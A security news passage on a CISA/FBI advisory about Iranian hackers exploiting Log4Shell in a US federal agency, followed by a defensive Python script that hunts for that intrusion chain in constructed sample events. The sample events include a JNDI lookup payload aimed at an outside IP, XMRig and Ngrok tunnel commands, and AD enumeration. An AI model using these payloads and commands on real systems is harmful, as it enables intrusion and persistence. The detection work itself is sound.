The malicious .doc attachment exploits the Microsoft Equation Editor vulnerability to fetch a URL and download an executable, the actual malware payload. Stolen data is then exfiltrated over SMTP to an email address.
Iran’s hackers targeted the US FCEB. The APT exploited the Log4Shell vulnerability, installed XMRig, moved laterally to the domain controller (DC), compromised credentials, and implanted Ngrok reverse proxies
Iranian state-sponsored hackers targeted a US Federal Civilian Executive Branch (FCEB) organization, according to a joint advisory from the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). The APT exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed the XMRig crypto-mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. Once on the domain controller, the actors ran a PowerShell command against Active Directory to obtain a list of all machines joined to the domain. They also changed the password of the local administrator account on several hosts as a fallback in case the rogue domain administrator account was detected and disabled. Additionally, the APT tried, unsuccessfully, to dump the memory of the Local Security Authority Subsystem Service (LSASS) process using Task Manager.
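Each stage of that intrusion chain leaves a distinct trace in endpoint telemetry, so it is worth showing what a hunt over it looks like. The following is an added example, not code from the advisory or from CISA/FBI: a small Python rule set run over constructed, simplified Sysmon/Windows Security events (process creation, LSASS handle opens, password resets, and a Horizon HTTP request header). Hostnames, paths, the pool address, the IP in the JNDI string and the LSASS accessor allowlist are all assumptions made up for the example.

```python
"""Hunt for the Log4Shell-to-domain-controller chain described above.

Added example with constructed sample events; field names are a simplified
stand-in for Sysmon (ID 1 process create, ID 10 process access), Windows
Security (ID 4724 password reset) and a web-server request log.
"""
import re

# Constructed sample events (not real telemetry). Hostnames and paths are invented.
SAMPLE_EVENTS = [
    # Log4Shell probe against the Horizon server: JNDI lookup string in a header.
    {"id": "http", "host": "horizon01", "header": "${jndi:ldap://203.0.113.5/a}"},
    # XMRig dropped and started on the compromised Horizon host.
    {"id": 1, "host": "horizon01", "image": r"C:\Users\Public\xmrig.exe",
     "cmdline": "xmrig.exe -o pool.example.invalid:3333"},
    # Ngrok reverse proxy exposing RDP for persistence.
    {"id": 1, "host": "ws07", "image": r"C:\ProgramData\ngrok.exe",
     "cmdline": "ngrok.exe tcp 3389"},
    # PowerShell enumeration of every computer object in the domain, run on the DC.
    {"id": 1, "host": "dc01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-ADComputer -Filter * | Select Name"},
    # Local Administrator password reset (backup access), and a benign reset.
    {"id": 4724, "host": "ws07", "subject": r"CORP\svc_backup", "target": "Administrator"},
    {"id": 4724, "host": "dc01", "subject": r"CORP\helpdesk", "target": "jsmith"},
    # Task Manager opening a handle to LSASS (the failed dump attempt).
    {"id": 10, "host": "dc01", "source_image": r"C:\Windows\System32\taskmgr.exe",
     "target_image": r"C:\Windows\System32\lsass.exe"},
    # Benign noise that must not fire.
    {"id": 1, "host": "ws03", "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "cmdline": "notepad++.exe"},
]

# Assumed allowlist of processes that legitimately open LSASS; tune per environment.
ALLOWED_LSASS_ACCESSORS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}
LOCAL_ADMIN_NAMES = {"administrator"}
# Plain JNDI form only; obfuscated variants (${${lower:j}ndi:...}) need extra patterns.
JNDI_RE = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)
AD_ENUM_RE = re.compile(r"get-adcomputer|get-domaincomputer|get-netcomputer")


def check_event(ev):
    """Return the list of finding labels that a single event triggers."""
    findings = []
    if ev["id"] == "http":
        if JNDI_RE.search(ev.get("header", "")):
            findings.append("jndi-lookup")
    elif ev["id"] == 1:
        image = ev["image"].lower()
        cmd = ev.get("cmdline", "").lower()
        if re.search(r"\bxmrig", image) or "xmrig" in cmd:
            findings.append("crypto-miner")
        if re.search(r"\bngrok", image) or re.search(r"\bngrok\b", cmd):
            findings.append("ngrok-tunnel")
        if "powershell" in image and AD_ENUM_RE.search(cmd):
            findings.append("ad-computer-enum")
    elif ev["id"] == 4724:
        if ev.get("target", "").lower() in LOCAL_ADMIN_NAMES:
            findings.append("local-admin-password-reset")
    elif ev["id"] == 10:
        if ev["target_image"].lower().endswith(r"\lsass.exe"):
            if ev["source_image"].lower() not in ALLOWED_LSASS_ACCESSORS:
                findings.append("lsass-access")
    return findings


def hunt(events):
    """Run every rule over every event; returns (host, finding) pairs in event order."""
    return [(ev["host"], f) for ev in events for f in check_event(ev)]


if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
```

Run on the constructed sample the hunt flags the JNDI probe on horizon01, the miner, the Ngrok tunnel on ws07, the AD enumeration and LSASS access on dc01, and the Administrator reset on ws07, while the helpdesk reset and Notepad++ stay quiet. The LSASS rule deliberately keys on "anything not on a short allowlist" rather than on Task Manager specifically, since the next attempt will use a different tool.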